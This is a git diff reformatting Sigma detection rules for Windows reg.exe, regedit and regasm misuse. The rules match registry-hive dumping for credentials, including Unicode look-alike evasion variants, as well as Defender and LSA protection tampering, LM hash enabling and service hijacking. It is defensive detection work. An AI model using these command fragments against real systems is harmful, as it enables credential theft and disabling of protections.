https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets -author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, - frack113 +author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113 date: 2019/10/22 modified: 2023/12/13 tags: @@ -32,32 +30,32 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_cli_flag: - CommandLine|contains: + CommandLine|contains: - ' save ' - ' export ' - - " \u02E2ave " - - " e\u02E3port " + - ' ˢave ' + - ' eˣport ' selection_cli_hklm: - CommandLine|contains: + CommandLine|contains: - hklm - - "hk\u02EAm" + - hk˪m - hkey_local_machine - - "hkey_\u02EAocal_machine" - - "hkey_loca\u02EA_machine" - - "hkey_\u02EAoca\u02EA_machine" + - hkey_˪ocal_machine + - hkey_loca˪_machine + - hkey_˪oca˪_machine selection_cli_hive: - CommandLine|contains: + CommandLine|contains: - \system - \sam - \security - - "\\\u02E2ystem" - - "\\sy\u02E2tem" - - "\\\u02E2y\u02E2tem" - - "\\\u02E2am" - - "\\\u02E2ecurity" + - \ˢystem + - \syˢtem + - \ˢyˢtem + - \ˢam + - \ˢecurity condition: process_creation and (all of selection_*) falsepositives: - Dumping hives for legitimate purpouse i.e. backup or forensic investigation diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml b/sigma/builtin/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml index d8522fbb9..9488a7267 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml @@ -1,16 +1,10 @@ title: Enumeration for Credentials in Registry id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 status: test -description: 'Adversaries may search the Registry on compromised systems for insecurely - stored credentials. - - The Windows Registry stores configuration information that can be used by the - system or other programs. - - Adversaries may query the Registry looking for credentials and passwords that - have been stored for use by other programs or services - - ' +description: | + Adversaries may search the Registry on compromised systems for insecurely stored credentials. + The Windows Registry stores configuration information that can be used by the system or other programs. + Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md author: frack113 @@ -27,20 +21,20 @@ detection: EventID: 4688 Channel: Security reg: - CommandLine|contains|all: + CommandLine|contains|all: - ' query ' - '/t ' - REG_SZ - /s - NewProcessName|endswith: \reg.exe + NewProcessName|endswith: \reg.exe hive: - - CommandLine|contains|all: - - '/f ' - - HKLM - - CommandLine|contains|all: - - '/f ' - - HKCU - - CommandLine|contains: HKCU\Software\SimonTatham\PuTTY\Sessions + - CommandLine|contains|all: + - '/f ' + - HKLM + - CommandLine|contains|all: + - '/f ' + - HKCU + - CommandLine|contains: HKCU\Software\SimonTatham\PuTTY\Sessions condition: process_creation and (reg and hive) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml b/sigma/builtin/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml index 392c86c8b..737dd9c0d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml @@ -1,11 +1,10 @@ title: Potential Suspicious Registry File Imported Via Reg.EXE id: 62e0298b-e994-4189-bc87-bc699aa62d97 related: - - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 - type: derived + - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 + type: derived status: test -description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' - utility +description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import author: frack113, Nasreddine Bencherchali @@ -22,12 +21,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_cli: - CommandLine|contains: ' import ' + CommandLine|contains: ' import ' selection_paths: - CommandLine|contains: + CommandLine|contains: - C:\Users\ - '%temp%' - '%tmp%' diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml b/sigma/builtin/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml index adb21940b..8588a04b5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml @@ -1,19 +1,13 @@ title: RestrictedAdminMode Registry Value Tampering - ProcCreation id: 28ac00d6-22d9-4a3c-927f-bbd770104573 related: - - id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 - type: similar + - id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 # Registry + type: similar status: test -description: 'Detects changes to the "DisableRestrictedAdmin" registry value in order - to disable or enable RestrictedAdmin mode. - - RestrictedAdmin mode prevents the transmission of reusable credentials to the - remote system to which you connect using Remote Desktop. - - This prevents your credentials from being harvested during the initial connection - process if the remote server has been compromise - - ' +description: | + Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. + RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. + This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise references: - https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md - https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx @@ -31,7 +25,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Control\Lsa\ - DisableRestrictedAdmin condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml b/sigma/builtin/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml index 1053db715..0c2e7c5bb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml @@ -1,8 +1,7 @@ title: LSA PPL Protection Disabled Via Reg.EXE id: 8c0eca51-0f88-4db2-9183-fdfb10c703f9 status: experimental -description: Detects the usage of the "reg.exe" utility to disable PPL protection - on the LSA process +description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process references: - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ author: Florian Roth (Nextron Systems) @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_cli: - CommandLine|contains: SYSTEM\CurrentControlSet\Control\Lsa - CommandLine|contains|all: + CommandLine|contains: SYSTEM\CurrentControlSet\Control\Lsa + CommandLine|contains|all: - ' add ' - ' /d 0' - ' /v RunAsPPL ' diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_machineguid.yml b/sigma/builtin/process_creation/proc_creation_win_reg_machineguid.yml index 4bac96704..0f3222a2d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_machineguid.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_machineguid.yml @@ -17,11 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - SOFTWARE\Microsoft\Cryptography - '/v ' - MachineGuid - NewProcessName|endswith: \reg.exe + NewProcessName|endswith: \reg.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml b/sigma/builtin/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml index b21a9ba49..2a70c223f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml @@ -1,11 +1,10 @@ title: Modify Group Policy Settings id: ada4b0c4-758b-46ac-9033-9004613a150d related: - - id: b7216a7d-687e-4c8d-82b1-3080b2ad961f - type: similar + - id: b7216a7d-687e-4c8d-82b1-3080b2ad961f + type: similar status: test -description: Detect malicious GPO modifications can be used to implement many other - malicious behaviors. +description: Detect malicious GPO modifications can be used to implement many other malicious behaviors. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md author: frack113 @@ -22,12 +21,12 @@ detection: EventID: 4688 Channel: Security selection_reg: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_path: - CommandLine|contains: \SOFTWARE\Policies\Microsoft\Windows\System + CommandLine|contains: \SOFTWARE\Policies\Microsoft\Windows\System selection_key: - CommandLine|contains: + CommandLine|contains: - GroupPolicyRefreshTimeDC - GroupPolicyRefreshTimeOffsetDC - GroupPolicyRefreshTime diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_nolmhash.yml b/sigma/builtin/process_creation/proc_creation_win_reg_nolmhash.yml index 9592a1e3f..5c6028e88 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_nolmhash.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_nolmhash.yml @@ -1,16 +1,12 @@ title: Enable LM Hash Storage - ProcCreation id: 98dedfdd-8333-49d4-9f23-d7018cccae53 related: - - id: c420410f-c2d8-4010-856b-dffe21866437 - type: similar + - id: c420410f-c2d8-4010-856b-dffe21866437 # Registry + type: similar status: test -description: 'Detects changes to the "NoLMHash" registry value in order to allow Windows - to store LM Hashes. - - By setting this registry value to "0" (DWORD), Windows will be allowed to store - a LAN manager hash of your password in Active Directory and local SAM databases. - - ' +description: | + Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. + By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. references: - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password @@ -29,7 +25,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Control\Lsa - NoLMHash - ' 0' diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_open_command.yml b/sigma/builtin/process_creation/proc_creation_win_reg_open_command.yml index 57404109b..fb10c3b5e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_open_command.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_open_command.yml @@ -1,8 +1,7 @@ title: Suspicious Reg Add Open Command id: dd3ee8cc-f751-41c9-ba53-5a32ed47e563 status: test -description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry - hives using DelegateExecute key +description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key references: - https://thedfirreport.com/2021/12/13/diavol-ransomware/ author: frack113 @@ -19,21 +18,21 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - reg - add - hkcu\software\classes\ms-settings\shell\open\command - '/ve ' - /d selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - reg - add - hkcu\software\classes\ms-settings\shell\open\command - /v - DelegateExecute selection_3: - CommandLine|contains|all: + CommandLine|contains|all: - reg - delete - hkcu\software\classes\ms-settings diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_query_registry.yml b/sigma/builtin/process_creation/proc_creation_win_reg_query_registry.yml index 8b057de99..4d0ee720d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_query_registry.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_query_registry.yml @@ -1,9 +1,7 @@ title: Potential Configuration And Service Reconnaissance Via Reg.EXE id: 970007b7-ce32-49d0-a4a4-fbef016950bd status: test -description: Detects the usage of "reg.exe" in order to query reconnaissance information - from the registry. Adversaries may interact with the Windows registry to gather - information about credentials, the system, configuration, and installed software. +description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md author: Timur Zinniatullin, oscd.community @@ -21,16 +19,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_flag: - CommandLine|contains: query + CommandLine|contains: query selection_key: - CommandLine|contains: + CommandLine|contains: - currentVersion\windows - winlogon\ - currentVersion\shellServiceObjectDelayLoad - - currentVersion\run + - currentVersion\run # Also covers the strings "RunOnce", "RunOnceEx" and "runServicesOnce" - currentVersion\policies\explorer\run - currentcontrolset\services condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml b/sigma/builtin/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml index cfaeda456..a4149b22e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml @@ -1,9 +1,7 @@ title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE id: 0d5675be-bc88-4172-86d3-1e96a4476536 status: test -description: Detects the execution of "reg.exe" for enabling/disabling the RDP service - on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' - values +description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport @@ -22,20 +20,20 @@ detection: EventID: 4688 Channel: Security selection_main_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_main_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' add ' - \CurrentControlSet\Control\Terminal Server - REG_DWORD - ' /f' selection_values_1: - CommandLine|contains|all: + CommandLine|contains|all: - Licensing Core - EnableConcurrentSessions selection_values_2: - CommandLine|contains: + CommandLine|contains: - WinStations\RDP-Tcp - MaxInstanceCount - fEnableWinStation diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_screensaver.yml b/sigma/builtin/process_creation/proc_creation_win_reg_screensaver.yml index 017f44972..f6ccdde73 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_screensaver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_screensaver.yml @@ -1,13 +1,9 @@ title: Suspicious ScreenSave Change by Reg.exe id: 0fc35fc3-efe6-4898-8a37-0b233339524f status: test -description: 'Adversaries may establish persistence by executing malicious content - triggered by user inactivity. - - Screensavers are programs that execute after a configurable time of user inactivity - and consist of Portable Executable (PE) files with a .scr file extension - - ' +description: | + Adversaries may establish persistence by executing malicious content triggered by user inactivity. + Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf @@ -25,30 +21,30 @@ detection: EventID: 4688 Channel: Security selection_reg: - CommandLine|contains: + CommandLine|contains: - HKEY_CURRENT_USER\Control Panel\Desktop - HKCU\Control Panel\Desktop - NewProcessName|endswith: \reg.exe - selection_option_1: - CommandLine|contains|all: + NewProcessName|endswith: \reg.exe + selection_option_1: # /force Active ScreenSaveActive + CommandLine|contains|all: - /v ScreenSaveActive - /t REG_SZ - /d 1 - /f - selection_option_2: - CommandLine|contains|all: + selection_option_2: # /force set ScreenSaveTimeout + CommandLine|contains|all: - /v ScreenSaveTimeout - /t REG_SZ - '/d ' - /f - selection_option_3: - CommandLine|contains|all: + selection_option_3: # /force set ScreenSaverIsSecure + CommandLine|contains|all: - /v ScreenSaverIsSecure - /t REG_SZ - /d 0 - /f - selection_option_4: - CommandLine|contains|all: + selection_option_4: # /force set a .scr + CommandLine|contains|all: - /v SCRNSAVE.EXE - /t REG_SZ - '/d ' diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_service_imagepath_change.yml b/sigma/builtin/process_creation/proc_creation_win_reg_service_imagepath_change.yml index 2c72eb104..01576404a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_service_imagepath_change.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_service_imagepath_change.yml @@ -1,16 +1,10 @@ title: Changing Existing Service ImagePath Value Via Reg.EXE id: 9b0b7ac3-6223-47aa-a3fd-e8f211e637db status: test -description: 'Adversaries may execute their own malicious payloads by hijacking the - Registry entries used by services. - - Adversaries may use flaws in the permissions for registry to redirect from the - originally specified executable to one that they control, in order to launch their - own code at Service start. - +description: | + Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. + Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe author: frack113 @@ -27,13 +21,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'add ' - SYSTEM\CurrentControlSet\Services\ - ' ImagePath ' - NewProcessName|endswith: \reg.exe + NewProcessName|endswith: \reg.exe selection_value: - CommandLine|contains: + CommandLine|contains: - ' /d ' - ' -d ' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_software_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_reg_software_discovery.yml index 43f517261..be6e7ca26 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_software_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_software_discovery.yml @@ -1,15 +1,13 @@ title: Detected Windows Software Discovery id: e13f668e-7f95-443d-98d2-1816a7648a7b related: - - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 - type: derived + - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 + type: derived status: test -description: Adversaries may attempt to enumerate software for a variety of reasons, - such as figuring out what security measures are present or if the compromised - system has a version of software that is vulnerable. +description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md - - https://github.com/harleyQu1nn/AggressorScripts + - https://github.com/harleyQu1nn/AggressorScripts # AVQuery.cna author: Nikita Nazarov, oscd.community date: 2020/10/16 modified: 2022/10/09 @@ -24,12 +22,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - query - \software\ - /v - svcversion - NewProcessName|endswith: \reg.exe + NewProcessName|endswith: \reg.exe condition: process_creation and selection falsepositives: - Legitimate administration activities diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_susp_paths.yml b/sigma/builtin/process_creation/proc_creation_win_reg_susp_paths.yml index 218099140..3a9aab61b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_susp_paths.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_susp_paths.yml @@ -1,8 +1,7 @@ title: Reg Add Suspicious Paths id: b7e2a8d4-74bb-4b78-adc9-3f92af2d4829 status: test -description: Detects when an adversary uses the reg.exe utility to add or modify new - keys or subkeys +description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md @@ -22,10 +21,11 @@ detection: EventID: 4688 Channel: Security selection_reg: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_path: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious registry locations below - \AppDataLow\Software\Microsoft\ - \Policies\Microsoft\Windows\OOBE - \Policies\Microsoft\Windows NT\CurrentVersion\Winlogon diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_volsnap_disable.yml b/sigma/builtin/process_creation/proc_creation_win_reg_volsnap_disable.yml index 4435776b2..8b3b94738 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_volsnap_disable.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_volsnap_disable.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \Services\VSS\Diag - /d Disabled condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_windows_defender_tamper.yml b/sigma/builtin/process_creation/proc_creation_win_reg_windows_defender_tamper.yml index f81b03666..72c90d546 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_windows_defender_tamper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_windows_defender_tamper.yml @@ -1,15 +1,12 @@ title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE id: 452bce90-6fb0-43cc-97a5-affc283139b3 status: experimental -description: Detects the usage of "reg.exe" to tamper with different Windows Defender - registry keys in order to disable some important features related to protection - and detection +description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection references: - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ - https://github.com/swagkarna/Defeat-Defender-V1.2.0 - https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2 -author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) date: 2022/03/22 modified: 2023/06/05 tags: @@ -23,18 +20,18 @@ detection: EventID: 4688 Channel: Security selection_root_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_root_path: - CommandLine|contains: + CommandLine|contains: - SOFTWARE\Microsoft\Windows Defender\ - SOFTWARE\Policies\Microsoft\Windows Defender Security Center - SOFTWARE\Policies\Microsoft\Windows Defender\ selection_dword_0: - CommandLine|contains|all: + CommandLine|contains|all: - ' add ' - d 0 - CommandLine|contains: + CommandLine|contains: - DisallowExploitProtectionOverride - EnableControlledFolderAccess - MpEnablePus @@ -43,10 +40,10 @@ detection: - SubmitSamplesConsent - TamperProtection selection_dword_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' add ' - d 1 - CommandLine|contains: + CommandLine|contains: - DisableAntiSpyware - DisableAntiSpywareRealtimeProtection - DisableAntiVirus diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml b/sigma/builtin/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml index bb4adaa42..2b9f0857d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml @@ -1,9 +1,7 @@ title: Write Protect For Storage Disabled id: 75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13 status: test -description: Looks for changes to registry to disable any write-protect property for - storage devices. This could be a precursor to a ransomware attack and has been - an observed technique used by cypherpunk group. +description: Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group. author: Sreeman date: 2021/06/11 modified: 2023/12/15 @@ -18,11 +16,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Control - Write Protection - '0' - CommandLine|contains: + CommandLine|contains: - storage - storagedevicepolicies condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml b/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml index b282daab7..334cf3034 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 related: - - id: cc368ed0-2411-45dc-a222-510ace303cb2 - type: derived + - id: cc368ed0-2411-45dc-a222-510ace303cb2 + type: derived status: test -description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities - with an uncommon extension. +description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension. references: - https://www.fortiguard.com/threat-signal-report/4718?s=09 - https://lolbas-project.github.io/lolbas/Binaries/Regasm/ @@ -23,14 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \Regsvcs.exe - - \Regasm.exe - - OriginalFileName: - - RegSvcs.exe - - RegAsm.exe + - NewProcessName|endswith: + - \Regsvcs.exe + - \Regasm.exe + - OriginalFileName: + - RegSvcs.exe + - RegAsm.exe selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: Add more potentially uncommon extensions - .dat - .gif - .jpeg diff --git a/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml b/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml index 619b3d69d..81fe1817f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location id: cc368ed0-2411-45dc-a222-510ace303cb2 related: - - id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 - type: derived + - id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 + type: derived status: test -description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities - from a potentially suspicious location +description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location references: - https://www.fortiguard.com/threat-signal-report/4718?s=09 - https://lolbas-project.github.io/lolbas/Binaries/Regasm/ @@ -24,19 +23,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \Regsvcs.exe - - \Regasm.exe - - OriginalFileName: - - RegSvcs.exe - - RegAsm.exe + - NewProcessName|endswith: + - \Regsvcs.exe + - \Regasm.exe + - OriginalFileName: + - RegSvcs.exe + - RegAsm.exe selection_dir: - CommandLine|contains: + CommandLine|contains: + # Note: Add more potentially suspicious directories - \AppData\Local\Temp\ - \Microsoft\Windows\Start Menu\Programs\Startup\ - \PerfLogs\ - \Users\Public\ - \Windows\Temp\ + # - '\Desktop\' + # - '\Downloads\' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_regedit_export_critical_keys.yml b/sigma/builtin/process_creation/proc_creation_win_regedit_export_critical_keys.yml index ae20d1daf..e763a2954 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regedit_export_critical_keys.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regedit_export_critical_keys.yml @@ -1,8 +1,8 @@ title: Exports Critical Registry Keys To a File id: 82880171-b475-4201-b811-e9c826cd5eaa related: - - id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a - type: similar + - id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a + type: similar status: test description: Detects the export of a crital Registry key to a file. references: @@ -22,18 +22,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - NewProcessName|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' /E ' - ' -E ' selection_cli_2: - CommandLine|contains: + CommandLine|contains: - hklm - hkey_local_machine selection_cli_3: - CommandLine|endswith: + CommandLine|endswith: - \system - \sam - \security diff --git a/sigma/builtin/process_creation/proc_creation_win_regedit_export_keys.yml b/sigma/builtin/process_creation/proc_creation_win_regedit_export_keys.yml index 28562f91d..cd6b5e0c7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regedit_export_keys.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regedit_export_keys.yml @@ -1,8 +1,8 @@ title: Exports Registry Key To a File id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a related: - - id: 82880171-b475-4201-b811-e9c826cd5eaa - type: similar + - id: 82880171-b475-4201-b811-e9c826cd5eaa + type: similar status: test description: Detects the export of the target Registry key to a file. references: 